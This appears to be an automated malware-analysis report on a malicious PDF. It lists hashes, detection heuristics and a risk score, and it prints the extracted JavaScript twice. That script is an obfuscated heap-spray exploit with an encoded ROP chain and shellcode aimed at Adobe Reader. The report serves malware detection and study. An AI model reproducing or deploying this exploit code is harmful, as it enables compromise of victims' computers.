PDF malware analysis — malicious · c5a17cec7f218d0f

MALICIOUS

PDF

9.0 KB Created: 2009-11-24 11:54:10 Authoring application: Acrobat Distiller 8.0.0 First seen: 2026-05-08

MD5: 91f8606ec4d9f6351f3f21e453a419b6 SHA-1: 094c530a48e0e0c96f194e6afaa2155ee85f7cba SHA-256: c5a17cec7f218d0f2fa57bcb08e3d847a711f3d7cc5e616eca283f835305a8b7

106 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY

PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x1B9B 3490 bytes

Filename	Kind	Source	Size
`javascript_obj0013_000.js`	pdf-javascript-stream	PDF /JS object 13 at offset 0x1B9B	3490 bytes
SHA-256: `c45a83c1fa1272414c58c36d0d1ff1717b1b1be21dee4cf2ed60b163cda5654b`
Preview script First 1,000 lines of the extracted script var LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW = unescape; var GwxMOaGTDIbubiLZOOi = LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW( "%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uccdb%ua7bd%uf9f1%ud905%u2474%u5af4%uc933%u5eb1%u6a31%u8317%u04c2%ucd03%u1be2%ufaf0%u8615%ucfb1%u50dc%u13ff%u1cde%u61cb%ufe79%u9ece%u177c%u9fc5%u1880%u136a%u7ee6%u6812%ub9e5%uf78c%u238f%udedc%u4125%u6508%u7471%uf413%u3968%u1cb1%uab29%u6758%u56d3%u75c8%udef3%u1b97%uf7e9%u7125%u3779%u4dfb%u6190%u2f9e%u0687%u386c%ub267%uabad%u83f9%u2914%u9ea4%u3645%u6128%u0fb3%u35da%u502e%u2f66%u2614%ucae1%u1cf1%u1441%uf113%u3570%u6b91%u912e%u10e2%u7955%ubf01%u20f0%udc37%ubb16%u7d2d%u5180%u721b%u9533%ubdea%u8fd5%u2794%u3bb9%u986d%u8a23%ue517%u53be%u712b%u227e%u186f%u5ce6%u4575%u9093%u6055%u3704%uf186%ue753%u324f%u8279%uaed6%u9f3b%u0490%u91a5%uc696%ub4b7%u0e9c%u3470%u3340%u58e5%u379c%ufa83%u9ef5%u357d%uefc3%ua0b7%u8a1a%u6855%u9e6a%ubc3c%ud705%u8ea7%u4dbb%u3a7e%uc858%u246d%u21a8%u6fa2%ufe4e%ub0fe%u7bbd%u9b76%u219b%u6409%ub37d%u448f%ud67e%u9299%ud289%u98c2%uc98b%u880f%u949e%ub12e%u6cb2%ua02e%u8ca0%ue85b%u87cb%ue958%ua1c1%uee4a%ud4c2%u1f43%u3a05%u1cba%u5b10%u3ce1%ub615%u4ed7%ub43d%u4d10%u915b%u5617%ucca1%u5c28%u16b1%u4323%u7f9e%u6f58%u8bea%u8757%ubf8c%ubd53%uc972%uc98a%uc378%ucbab%udd4e%uc493%udda4%ubcf4%u692f%ucf71%ube95%u4a56%ua586%uf1c6%u4478%u967b%ueaaa%u49e0%uddd2%uf081%u4460%u9e36%uf6a6%u10ae%u4137" ); var aV = LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (aV.length + 20 + 8 < 65536) aV+=aV; eDoIoFvtryuHUMXQgkvdE = aV.substring(0, (0x0c0c-0x24)/2); eDoIoFvtryuHUMXQgkvdE += GwxMOaGTDIbubiLZOOi; eDoIoFvtryuHUMXQgkvdE += aV; g = eDoIoFvtryuHUMXQgkvdE.substring(0, 65536/2); while(g.length < 0x80000) g += g; mDbkYTBYxwNHMBkdMaRLPvSicTROvgvbIZdYRIMJDtqNJNFIgCpkPdUckHHSwhuzwHUZgtNqq = g.substring(0, 0x80000 - (0x1020-0x08) / 2); var kFHCU = new Array(); for (NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY=0;NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY<0x1f0;NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY++) kFHCU[NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY]=mDbkYTBYxwNHMBkdMaRLPvSicTROvgvbIZdYRIMJDtqNJNFIgCpkPdUckHHSwhuzwHUZgtNqq+"s";

SHA-256: c45a83c1fa1272414c58c36d0d1ff1717b1b1be21dee4cf2ed60b163cda5654b

Preview script

First 1,000 lines of the extracted script

var LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW = unescape;
var GwxMOaGTDIbubiLZOOi = LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW( "%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uccdb%ua7bd%uf9f1%ud905%u2474%u5af4%uc933%u5eb1%u6a31%u8317%u04c2%ucd03%u1be2%ufaf0%u8615%ucfb1%u50dc%u13ff%u1cde%u61cb%ufe79%u9ece%u177c%u9fc5%u1880%u136a%u7ee6%u6812%ub9e5%uf78c%u238f%udedc%u4125%u6508%u7471%uf413%u3968%u1cb1%uab29%u6758%u56d3%u75c8%udef3%u1b97%uf7e9%u7125%u3779%u4dfb%u6190%u2f9e%u0687%u386c%ub267%uabad%u83f9%u2914%u9ea4%u3645%u6128%u0fb3%u35da%u502e%u2f66%u2614%ucae1%u1cf1%u1441%uf113%u3570%u6b91%u912e%u10e2%u7955%ubf01%u20f0%udc37%ubb16%u7d2d%u5180%u721b%u9533%ubdea%u8fd5%u2794%u3bb9%u986d%u8a23%ue517%u53be%u712b%u227e%u186f%u5ce6%u4575%u9093%u6055%u3704%uf186%ue753%u324f%u8279%uaed6%u9f3b%u0490%u91a5%uc696%ub4b7%u0e9c%u3470%u3340%u58e5%u379c%ufa83%u9ef5%u357d%uefc3%ua0b7%u8a1a%u6855%u9e6a%ubc3c%ud705%u8ea7%u4dbb%u3a7e%uc858%u246d%u21a8%u6fa2%ufe4e%ub0fe%u7bbd%u9b76%u219b%u6409%ub37d%u448f%ud67e%u9299%ud289%u98c2%uc98b%u880f%u949e%ub12e%u6cb2%ua02e%u8ca0%ue85b%u87cb%ue958%ua1c1%uee4a%ud4c2%u1f43%u3a05%u1cba%u5b10%u3ce1%ub615%u4ed7%ub43d%u4d10%u915b%u5617%ucca1%u5c28%u16b1%u4323%u7f9e%u6f58%u8bea%u8757%ubf8c%ubd53%uc972%uc98a%uc378%ucbab%udd4e%uc493%udda4%ubcf4%u692f%ucf71%ube95%u4a56%ua586%uf1c6%u4478%u967b%ueaaa%u49e0%uddd2%uf081%u4460%u9e36%uf6a6%u10ae%u4137" );
var aV = LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (aV.length + 20 + 8 < 65536) aV+=aV;
eDoIoFvtryuHUMXQgkvdE = aV.substring(0, (0x0c0c-0x24)/2);
eDoIoFvtryuHUMXQgkvdE += GwxMOaGTDIbubiLZOOi;
eDoIoFvtryuHUMXQgkvdE += aV;
g = eDoIoFvtryuHUMXQgkvdE.substring(0, 65536/2);
while(g.length < 0x80000) g += g;
mDbkYTBYxwNHMBkdMaRLPvSicTROvgvbIZdYRIMJDtqNJNFIgCpkPdUckHHSwhuzwHUZgtNqq = g.substring(0, 0x80000 - (0x1020-0x08) / 2);
var kFHCU = new Array();
for (NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY=0;NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY<0x1f0;NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY++) kFHCU[NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY]=mDbkYTBYxwNHMBkdMaRLPvSicTROvgvbIZdYRIMJDtqNJNFIgCpkPdUckHHSwhuzwHUZgtNqq+"s";

Open this report in the interactive analyzer, or submit your own file for analysis.